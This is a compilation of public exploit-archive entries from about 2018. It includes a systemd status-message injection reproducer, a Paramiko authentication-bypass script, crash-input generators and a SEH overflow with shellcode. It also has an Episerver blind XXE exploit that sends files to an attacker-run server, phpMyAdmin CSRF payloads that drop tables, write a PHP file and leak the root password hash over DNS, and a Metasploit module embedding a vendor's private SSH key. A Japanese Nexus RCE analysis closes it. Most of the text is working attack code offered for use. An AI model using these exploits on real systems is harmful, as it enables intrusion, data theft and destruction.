2018-04-20: ASRock notified that the driver was modified and sent to
SecureAuth the fixed applications and requested for a feedback.
2018-04-23: SecureAuth acknowledged the reception of the fixed
applications.
2018-05-09: SecureAuth tested the modified driver and verified that the
issues detailed in the proofs of concept were solved.
For that reason, SecureAuth propose release date to be May 23rd.
2018-05-09: ASRock thanked SecureAuth's update and forwarded the
proposal to its HQ for a confirmation.
2018-05-15: ASRock notified SecureAuth that they were going to deploy
the new driver architecture into each ASRock utility.
For the whole project, ASRock estimated to finish by the end of June.
2018-05-15: SecureAuth thanked ASRock's update and asked if ASRock had
planned to release a security note.
2018-05-23: ASRock informed that each utility would include a release
note with a security description.
2018-06-15: SecureAuth requested ASRock a status update about its
timescale.
2018-06-09: ASRock forwarded the request to its HQ.
2018-06-19: ASRock informed that they had started to upload the fixed
drivers for one of the supported motherboard series
and they were going to continue uploading the drivers for other models.
2018-07-11: SecureAuth requested ASRock a status update.
2018-07-11: ASRock replied saying they were still working on the upload
process.
2018-08-06: SecureAuth requested ASRock a new status update.
2018-08-16: ASRock notified SecureAuth they had finished with the update
process.
2018-10-17: SecureAuth set October 25th as the publication date.
2018-10-25: Advisory CORE-2018-0005 published.
9. *References*
[1] http://www.asrock.com/
10. *About SecureAuth Labs*
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct research in several important areas of
computer security, including identity-related attacks, system
vulnerabilities and cyber-attack planning. Research includes problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. We regularly publish security
advisories, primary research, technical publications, research blogs,
project information, and shared software tools for public use at
http://www.secureauth.com.
11. *About SecureAuth*
SecureAuth is leveraged by leading companies, their employees, their
customers and their partners to eliminate identity-related breaches.
As a leader in access management, identity governance, and penetration
testing, SecureAuth is powering an identity security revolution by
enabling people and devices to intelligently and adaptively access
systems and data, while effectively keeping bad actors from doing harm.
By ensuring the continuous assessment of risk and enablement of trust,
SecureAuth's highly flexible Identity Security Automation (ISA) platform
makes it easier for organizations to prevent the misuse of credentials
and exponentially reduce the enterprise threat surface. To learn more,
visit www.secureauth.com<http://www.secureauth.com>, call (949) 777-6959, or email us at
info@secureauth.com<mailto:info@secureauth.com>
12. *Disclaimer*
The contents of this advisory are copyright (c) 2018 SecureAuth, and are
licensed under a Creative Commons Attribution Non-Commercial Share-Alike
3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
/*
[I am sending this bug report to Ubuntu, even though it's an upstream
bug, as requested at
https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports
.]
When systemd re-executes (e.g. during a package upgrade), state is
serialized into a memfd before the execve(), then reloaded after the
execve(). Serialized data is stored as text, with key-value pairs
separated by newlines. Values are escaped to prevent control character
injection.
Lines associated with a systemd unit are read in unit_deserialize()
using fgets():
char line[LINE_MAX], *l, *v;
[...]
if (!fgets(line, sizeof(line), f)) {
if (feof(f))
return 0;
return -errno;
}
LINE_MAX is 2048:
/usr/include/bits/posix2_lim.h:#define LINE_MAX _POSIX2_LINE_MAX
/usr/include/bits/posix2_lim.h:#define _POSIX2_LINE_MAX 2048
When fgets() encounters overlong input, it behaves dangerously. If a
line is more than 2047 characters long, fgets() will return the first
2047 characters and leave the read cursor in the middle of the
overlong line. Then, when fgets() is called the next time, it
continues to read data from offset 2047 in the line as if a new line
started there. Therefore, if an attacker can inject an overlong value
into the serialized state somehow, it is possible to inject extra
key-value pairs into the serialized state.
A service that has `NotifyAccess != none` can send a status message to
systemd that will be stored as a property of the service. When systemd
re-executes, this status message is stored under the key
"status-text".
Status messages that are sent to systemd are received by
manager_dispatch_notify_fd(). This function has a receive buffer of
size NOTIFY_BUFFER_MAX==PIPE_BUF==4096.
Therefore, a service with `NotifyAccess != none` can trigger this bug.
Reproducer:
Create a simple service with NotifyAccess by copying the following
text into /etc/systemd/system/notify_test.service (assuming that your
home directory is /home/user):
=========
[Unit]
Description=jannh test service for systemd notifications
[Service]
Type=simple
NotifyAccess=all
FileDescriptorStoreMax=100
User=user
ExecStart=/home/user/test_service
Restart=always
[Install]
WantedBy=multi-user.target
=========
Create a small binary that sends an overlong status when it starts up:
=========
*/
user@ubuntu-18-04-vm:~$ cat test_service.c
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <err.h>
#include <signal.h>
#include <stdio.h>
int main(void) {
int sock = socket(AF_UNIX, SOCK_DGRAM, 0);
if (sock == -1) err(1, "socket");
struct sockaddr_un addr = {
.sun_family = AF_UNIX,
.sun_path = "/run/systemd/notify"
};
if (connect(sock, (struct sockaddr *)&addr, sizeof(addr))) err(1, "connect");
char message[0x2000] = "STATUS=";
memset(message+7, 'X', 2048-1-12);
strcat(message, "main-pid=13371337");
struct iovec iov = {
.iov_base = message,
.iov_len = strlen(message)
};
union {
struct cmsghdr cmsghdr;
char buf[CMSG_SPACE(sizeof(struct ucred))];
} control = { .cmsghdr = {
.cmsg_level = SOL_SOCKET,
.cmsg_type = SCM_CREDENTIALS,
.cmsg_len = CMSG_LEN(sizeof(struct ucred))
}};
struct ucred *ucred = (void*)(control.buf + CMSG_ALIGN(sizeof(struct cmsghdr)));
ucred->pid = getpid();
ucred->uid = getuid();
ucred->gid = getgid();
struct msghdr msghdr = {
.msg_iov = &iov,
.msg_iovlen = 1,
.msg_control = &control,
.msg_controllen = sizeof(control)
};
if (sendmsg(sock, &msghdr, 0) != strlen(message)) err(1, "sendmsg");
while (1) pause();
}
/*
user@ubuntu-18-04-vm:~$ gcc -o test_service test_service.c
user@ubuntu-18-04-vm:~$
=========
Install the service, and start it. Then run strace against systemd,
and run:
=========
root@ubuntu-18-04-vm:~# systemctl daemon-reexec
root@ubuntu-18-04-vm:~# systemctl stop notify_test.service
=========
The "stop" command hangs, and you'll see the following in strace:
=========
root@ubuntu-18-04-vm:~# strace -p1 2>&1 | grep 13371337
openat(AT_FDCWD, "/proc/13371337/stat", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
kill(13371337, SIG_0) = -1 ESRCH (No such process)
kill(13371337, SIGTERM) = -1 ESRCH (No such process)
=========
This demonstrates that systemd's representation of the service's PID
was clobbered by the status message.
This can in theory, depending on how the active services are
configured and some other things, also be used to e.g. steal file
descriptors that other services have stored in systemd (visible in
the serialized representation as "fd-store-fd").
This isn't the only place in systemd that uses fgets(); other uses of
fgets() should probably also be audited and potentially replaced with
a safer function.
*/
# Exploit Title: Card Payment 1.0 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/admin/mod_users/controller.php?action=edit
#
POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
USERID=1&UNAME=Anonymous&USERNAME=admin&deptid=&UPASS=Efe&ROLE=Administrator&deptid=&PHONE=912856478&save=
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 20:16:05 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# Exploit Title: Paramiko 2.4.1 - Authentication Bypass
# Date: 2018-10-27
# Exploit Author: Adam Brown
# Vendor Homepage: https://www.paramiko.org
# Software Link: https://github.com/paramiko/paramiko/tree/v1.15.2
# Version: < 1.17.6, 1.18.x < 1.18.5, 2.0.x < 2.0.8, 2.1.x < 2.1.5, 2.2.x < 2.2.3, 2.3.x < 2.3.2, and 2.4.x < 2.4.1
# Tested on: Multiple
# CVE : CVE-2018-7750
# This PoC is based on discussions found at the following github issue:
# https://github.com/paramiko/paramiko/issues/1175
# TLDR, Paramiko doesn't check if the client has completed the authentication step
# before allowing the client to open channels. The PoC below connects to an SFTP
# server, and lists the root directory without authenticating. Slight modification
# is required if you want to open an SSH channel.
#!/usr/bin/python
import paramiko
host = '127.0.0.1'
port = 22
trans = paramiko.Transport((host, port))
trans.start_client()
# If the call below is skipped, no username or password is required.
# trans.auth_password('username', 'password')
sftp = paramiko.SFTPClient.from_transport(trans)
print(sftp.listdir('/'))
sftp.close()
#Exploit Title: NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-08-30
#Vendor Homepage: https://www.networkactiv.com/WebServer.html
#Software Link: https://www.networkactiv.com/Dev/
#Tested Version: 4.0 Pre-Alpha-3.7.2
#Tested on: Windows 10 Single Language x64
#Steps to produce the crash:
#1.- Run python code: NetworkActiv_Web_Server_4.0_PA_3.7.2.py
#2.- Open Network.txt and copy content to clipboard
#2.- Open NetworkActiv Web Server 4.0
#3.- Select Security options
#4.- Select "Set username" and Paste ClipBoard on "New Value"
#6.- Select "Set password" and Put "1234" on "New Value"
#7.- Crashed
cod = "\x41" * 11250
f = open('Network.txt', 'w')
f.write(cod)
f.close()
# Exploit Title: Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-29
# Vendor Homepage: https://www.cisco.com/
# Software Link: App Store for iOS devices
# Tested Version: 4.6.01099
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 11.4.1
# Steps to Produce the Crash:
# 1.- Run python code: Cisco_AnyConnect_Secure_Mobility_Client_4.6.01099.py
# 2.- Copy content to clipboard
# 3.- Open App Cisco AnyConnect Secure Mobility Client
# 4.- Diagnosticos
# 5.- Certificados
# 6.- Importar certificado de usuario...
# 7.- Paste ClipBoard on "Introducir URL"
# 8.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 12380000
print (buffer)
# Exploit: Argus Surveillance DVR 4.0.0.0 - Directory Traversal
# Author: John Page (aka hyp3rlinx)
# Date: 2018-08-28
# Vendor: www.argussurveillance.com
# Software Link: http://www.argussurveillance.com/download/DVR_stp.exe
# CVE: N/A
# Description:
# Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal,
# leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
# PoC
curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
# Result:
; for 16-bit app support
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
wave=mmdrv.dll
timer=timer.drv
# https://vimeo.com/287115273
# Greetz: ***Greetz: indoushka | Eduardo | GGA***
# Exploit Title: Skype Empresarial Office 365 16.0.10730.20053 - 'Dirección de inicio de sesión' Denial of service (PoC)
# Discovery by: Samuel Cruz
# Discovery Date; 2018-08-29
# Vendor Homepage: https://www.skype.com/es/business/
# Tested Version: 16.0.10730.20053
# Tested on OS: Windows 10 Pro x64 es/home/
#Steps to produce the crash
#1.- Run python code : python SkypeforBusiness_16.0.10730.20053.py
#2.- Open SkypeforBusiness.txt and copy context to clipboard
#3.- Open Skype for business
#4.- Paste clipboard on "Dirección de inicio de sesión"
#5.- Iniciar sesión
#6.- Crashed
buffer = "\x41" * 595
f = open ("SkypeforBusiness.txt", "w")
f.write(buffer)
f.close()
#--------------------------------------------------------#
#Exploit Title: R v3.4.4 - (SEH) Buffer Overflow Exploit
#Exploit Author : ZwX
#Exploit Date: 2018-08-22
#Vendor Homepage : https://www.r-project.org/
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr
#Website: http://zwx-pentester.fr/
#--------------------------------------------------------#
#Technical Details & Description:
#================================
'''A local buffer overflow vulnerability has been discovered in the official R v3.4.4 software.
The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process.
The issue can be exploited by local attackers with system privileges to compromise the affected local computer system.
The vulnerability is marked as classic buffer overflow issue'''
# Manual steps to reproduce the vulnerability: under GUI preferences
# paste bo.txt contents into 'Language for menus and messages' click ok --> Now the calculator executes!
#!/usr/bin/python
from struct import pack
buffer = "x41" * 900
a = "\xeb\x14\x90\x90"
b = pack("<I",0x6cb85492) #pop esi # pop ebp # ret 04 | {PAGE_EXECUTE_READ} [R.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.4.4 (C:Program FilesRR-3.4.4bini386R.dll)
calc=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
nops = "\x90" * 20
poc = buffer + a + b + nops + calc
file = open("bo.txt","w")
file.write(poc)
file.close()
print "POC Created by ZwX"
#Solution - Fix & Patch:
#=======================
'''The solution could be to restrict and filter the number of characters on input of 'Language for menus and messages' '''
# Disclaimer:
#===============
'''Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the
author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
Copyright A(c) 2018 | ZwX - Security Researcher (Software & web application)'''
# Exploit Title: Episerver 7 patch 4 - XML External Entity Injection
# Google Dork: N/A
# Date: 2018-08-28
# Exploit Author: Jonas Lejon
# Vendor Homepage: https://www.episerver.se/
# Version: Episerver 7 patch 4 and below
# CVE : N/A
## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
## Starts a listening webserver, so the exploits needs a public IP and unfiltered port, configure RHOST below!
## Usage: ./episploit.py <target> [file-to-read]
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import urllib
import re
import sys
import time
import threading
import socket
SERVER_SOCKET = ('0.0.0.0', 8000)
EXFIL_FILE = 'file:///c:/windows/win.ini'
# The public facing IP. Change this
RHOST = '1.2.3.4:' + str(SERVER_SOCKET[1])
EXFILTRATED_EVENT = threading.Event()
class BlindXXEServer(BaseHTTPRequestHandler):
def response(self, **data):
code = data.get('code', 200)
content_type = data.get('content_type', 'text/plain')
body = data.get('body', '')
self.send_response(code)
self.send_header('Content-Type', content_type)
self.end_headers()
self.wfile.write(body.encode('utf-8'))
self.wfile.close()
def do_GET(self):
self.request_handler(self)
def do_POST(self):
self.request_handler(self)
def log_message(self, format, *args):
return
def request_handler(self, request):
global EXFILTRATED_EVENT
path = urllib.unquote(request.path).decode('utf8')
m = re.search('\/\?exfil=(.*)', path, re.MULTILINE)
if m and request.command.lower() == 'get':
data = path[len('/?exfil='):]
print 'Exfiltrated %s:' % EXFIL_FILE
print '-' * 30
print urllib.unquote(data).decode('utf8')
print '-' * 30 + '\n'
self.response(body='true')
EXFILTRATED_EVENT.set()
elif request.path.endswith('.dtd'):
print 'Sending malicious DTD file.'
dtd = '''<!ENTITY %% param_exfil SYSTEM "%(exfil_file)s">
<!ENTITY %% param_request "<!ENTITY exfil SYSTEM 'http://%(exfil_host)s/?exfil=%%param_exfil;'>">
%%param_request;''' % {'exfil_file' : EXFIL_FILE, 'exfil_host' : RHOST}
self.response(content_type='text/xml', body=dtd)
else:
print '[INFO] %s %s' % (request.command, request.path)
self.response(body='false')
def send_stage1(target):
content = '''<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://''' + RHOST + '''/test.dtd"><foo>&exfil;</foo>'''
payload = '''POST /util/xmlrpc/Handler.ashx?pageid=1023 HTTP/1.1
Host: ''' + target + '''
User-Agent: curl/7.54.0
Accept: */*
Content-Length: ''' + str(len(content)) + '''
Content-Type: application/x-www-form-urlencoded
Connection: close
''' + content
print "Sending payload.."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 80
s.connect((target,port))
s.send(payload)
def main(target):
server = HTTPServer(SERVER_SOCKET, BlindXXEServer)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
send_stage1(target)
while not EXFILTRATED_EVENT.is_set():
pass
if __name__ == '__main__':
if len(sys.argv) > 1:
target = sys.argv[1]
if len(sys.argv) > 2:
EXFIL_FILE = sys.argv[2]
main(target)
# Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery
# Date: 2018-08-28
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.phpmyadmin.net/
# Software Link: https://www.phpmyadmin.net/downloads/
# Version: Versions 4.7.x (prior to 4.7.7)
# Tested on: php7 mysql5
# CVE: CVE-2017-1000499 -- Original Exploit Author: Ashutosh Barot
# Original Exploit Author: Ashutosh Barot ( www.twitter.com/ashu_barot)
# If victim DB Admin has active session with PhPMyAdmin < 4.7.7, Hitting this URL will result into DROP_TABLE,
https://example.com/phpMyAdmin/sql.php?db=DATABASE_NAME&goto=db_structure.php&table=wp_users&reload=1&purge=1&sql_query=DROP+TABLE+%60wp_users%60&message_to_show=Table+wp_users+has+been+dropped
# Exploit CSRF - Modifying the password of current user
<p>Hello World</p>
<img src="
http://server/sql.php?db=mysql&table=user&sql_query=SET%20password
%20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />
# Exploit CSRF - Arbitrary File Write
<p>Hello World</p>
<img src="
http://server/sql.php?db=mysql&table=user&sql_query=select
'<?php phpinfo();?>' into outfile '/var/www/html/test.php';"
style="display:none;" />
# Exploit CSRF - Data Retrieval over DNS
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE
user='root' LIMIT 1),'.vulnspy.com\\test'));
# Exploit CSRF - Empty All Rows From All Tables
<p>Hello World</p>
<img src="
http://server/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A"
style="display:none;" />
# Exploit Title: Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure
# Date: 2018-07-16
# WebPage: https://CTRLu.net/
# Vendor Homepage: http://www.eaton.com/
# Vendor Advisory: http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf
# Software Link: http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2
# Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted
# Recomended to update to Version 13.4.0.10 or above
# Tested on: Firmware 12.1.9.1 and 13.3.2.10
# CVE : N/A
# XXX: This shouldn't be necessary but is now
require 'net/ssh/command_stream'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SSH
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::CommandShell
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Eaton Xpert Meter SSH Private Key Exposure Scanner',
'Description' => %q{
Eaton Power Xpert Meters are used across industries for energy management,
monitoring circuit loading, and identifying power quality problems.
Meters running firmware 12.x.x.x or below version 13.3.x.x and below ship with
a public/private key pair on Power Xpert Meter hardware that allows
passwordless authentication to any other affected Power Xpert Meter.
The vendor recommends updating to Version 13.4.0.10 or above. As the key is
easily retrievable, an attacker can use it to gain unauthorized remote
access as uid0
},
'Author' => [
'BrianWGray'
],
'References' => [
['URL', 'http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],
['URL', 'https://www.ctrlu.net/vuln/0006.html']
],
'DisclosureDate' => 'Jul 18 2018',
'License' => MSF_LICENSE
))
register_options([
Opt::RPORT(22)
])
register_advanced_options([
OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]),
OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])
])
end
def run_host(ip)
factory = ssh_socket_factory
ssh_opts = {
auth_methods: ['publickey'],
port: rport,
key_data: [ key_data ],
hmac: ['hmac-sha1'],
encryption: ['aes128-cbc'],
kex: ['diffie-hellman-group1-sha1'],
host_key: ['ssh-rsa'],
use_agent: false,
config: false,
proxy: factory
}
ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
begin
ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
Net::SSH.start(ip, 'admin', ssh_opts)
end
rescue Net::SSH::Exception => e
vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")
return
end
return unless ssh
print_good("#{ip}:#{rport} - Logged in as admin")
version = ssh.transport.server_version.version
report_vuln(
host: ip,
name: self.name,
refs: self.references,
info: version
)
shell = Net::SSH::CommandStream.new(ssh)
return unless shell
info = "Eaton Xpert Meter SSH Backdoor (#{version})"
ds_merge = {
'USERNAME' => 'admin'
}
start_session(self, info, ds_merge, false, shell.lsock)
# XXX: Ruby segfaults if we don't remove the SSH socket
remove_socket(ssh.transport.socket)
end
def rport
datastore['RPORT']
end
def key_data
<<EOF
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQCfwugh3Y3mLbxw0q4RZZ5rfK3Qj8t1P81E6sXjhZl7C3FyH4Mj
C15CEzWovoQpRKrPdDaB5fVyuk6w2fKHrvHLmU2jTzq79B7A4JJEBQatAJeoVDgl
TyfL+q6BYAtAeNsho8eP/fMwrT2vhylNJ4BTsJbmdDJMoaaHu/0IB9Z9ywIBIwKB
gQCEX6plM+qaJeVHif3xKFAP6vZq+s0mopQjKO0bmpUczveZEsu983n8O81f7lA/
c2j1CITvSYI6fRyhKZ0RVnCRcaQ8h/grzZNdyyD3FcqDNKO7Xf+bvYySrQXhLeQP
I3jXGQPfBZUicGPcJclA98SBdBI1SReAUls1ZdzDwA3T8wJBAM6j1N3tYhdqal2W
gA1/WSQrFxTt28mFeUC8enGvKLRm1Nnxk/np9qy2L58BvZzCGyHAsZyVZ7Sqtfb3
YzqKMzUCQQDF7GrnrxNXWsIAli/UZscqIovN2ABRa2y8/JYPQAV/KRQ44vet2aaB
trQBK9czk0QLlBfXrKsofBW81+Swiwz/AkEAh8q/FX68zY8Ssod4uGmg+oK3ZYZd
O0kVKop8WVXY65QIN3LdlZm/W42qQ+szdaQgdUQc8d6F+mGNhQj4EIaz7wJAYCJf
z54t9zq2AEjyqP64gi4JY/szWr8mL+hmJKoRTGRo6G49yXhYMGAOSbY1U5CsBZ+z
zyf7XM6ONycIrYVeFQJABB8eqx/R/6Zwi8mVKMAF8lZXZB2dB+UOU12OGgvAHCKh
7izYQtGEgPDbklbvEZ31F7H2o337V6FkXQMFyQQdHA==
-----END RSA PRIVATE KEY-----
EOF
end
end
0x00脆弱性の背景
Nexus Repository Manager 3は、Maven、Nuget、およびその他のソフトウェアソースリポジトリの保存と配布に使用できるソフトウェアリポジトリです。 3.14.0および以前のバージョンでは、OrientDBカスタム関数に基づいた任意のJEXL式実行機能がありました。この関数には、許可されていないアクセスの脆弱性があり、任意のコマンド実行の脆弱性につながる可能性があります。 2019年2月5日、Sonatypeは、Nexus Repository Manager 3で、アクセス制御対策が不十分なため、この欠陥を使用して特定の要求を構築してサーバー上のJavaコードを実行することができるというセキュリティ発表を発表しました。
0x01衝撃の範囲
NexusリポジトリマネージャーOSS/Proバージョン3.6.2からバージョン3.14.0
0x02脆弱性の概要
脆弱性の公式の簡単な説明から、不正なアクセスユーザーがリクエストを作成して任意のコード実行を引き起こすことができるという理由だけで、単純に言えます。さらに、3.15.0+以上のバージョンがユーザー認証を追加したため、3.15.0+バージョンはこの脆弱性の影響を受けません。したがって、diffの結果に基づいて、org.sonatype.nexus.coreui.componentComponentの脆弱性を大まかに決定できます。
:
0x03全体的なトリガープロセス
extdirectmodule $ configure:60#バインディングおよびリクエスト解像度extdirectservlet $ dopost:155#dopost:155#request request request request directjngineRvlet $ dopost3:595 #Parse JSONリクエストJSONREQUESTPROCESOR $ Process:119クエリステートメントパッケージパッケージComponentComponent $ previewassets:208#query result browseserviceimpl $ previewassets3:252#build olientdb query statement browseserviceimpl $ previewassets3:258#スプライスクエリステートメントbrowseServiceimpl $ $ $ $ spiewassetets33:262#previewassetset MetadatanodeEntityAdapter $ countbyQuery:221#execute orientdb query contextExpressionfunction $ execute:125#抽出jexl式ContextExpressionFunction $ checkjexlexpression3:154#execute jexl式
0x03脆弱性分析
脆弱性のトリガーは、主にパッケージの解析とJEXL式の実行の2つの部分に分けられます。
1。パッケージ分析を投稿
最初に、Web.xmlでルーティング分析を行う方法を見てみましょう。
org.sonatype.nexus.bootstrap.osgi.delegatingFilterは、すべてのリクエストをインターセプトします。これは、動的なルーティングロードである可能性が非常に高いです。動的ルーティングの読み込みには、対応するモジュールモジュールがコードで構成をルートにバインドし、サーブレットを明示的にロードする必要があります。脆弱性の入力は、org.sonatype.nexus.extdirect.internal.extdirectmodule#Configure :にあります
直接フォローアップorg.sonatype.nexus.extdirect.internal.extdirectservlet $ dopost:
下降し続けて、投稿リクエストを処理する部分を確認します。
ここでは、フォローアップして、JSON形式でリクエストを処理する方法を確認します。
まず、JSONの構文ツリーを解析し、データを抽出します。
アクション、メソッド、TID、タイプ、およびデータの5つの変数が必要であることがわかります。
ISBatchedはパラメーターの長さによって決定され、返された配列の長さは1であるため、IsBatchedはfalseです。次に、ProcessIndividualRequestSinthisThiSthReadメソッドを渡します。
ここで返された結果を構築するとき、ここにはJSONの脱出プロセスがあることがわかります。ここでは、返品結果が主にJSON形式で返されます。
2。 JEXL式の実行
ポストパッケージの分析から、5つのパラメーターを構築する必要があることがわかります。同時に、アクションと方法を構築した後、対応するクラスとメソッドを直接かつ動的に呼び出すことができます。
この脆弱性は、org.sonatype.nexus.coreui.componentComponent#previewassets:に表示されます
まず、repositoryName、expression、およびPostパッケージの入力の値を取り出します。これらの3つのパラメーターは、既存のリポジトリの名前、式のタイプ、および式を表します。
JEXLの処理プロセスに焦点を当てます:
これは単なるインスタンス化されたjexlselectorオブジェクトであり、式を実行するために評価を呼び出さないため、脆弱性のトリガーポイントは他の場所にあることに注意してください。実際の式の実行ポイントは、browserservice.previewassetsのプロセスにあります。これは、この脆弱性で最も困難なポイントでもあります。
org.sonatype.nexus.repository.browse.internal.browseserviceimpl#previewassetsで、プレビューアセットの実装についてフォローアップ:
ここでは、式がSQLクエリを形成するパラメーターとして使用され、OrientDBによって実行されることがわかります。
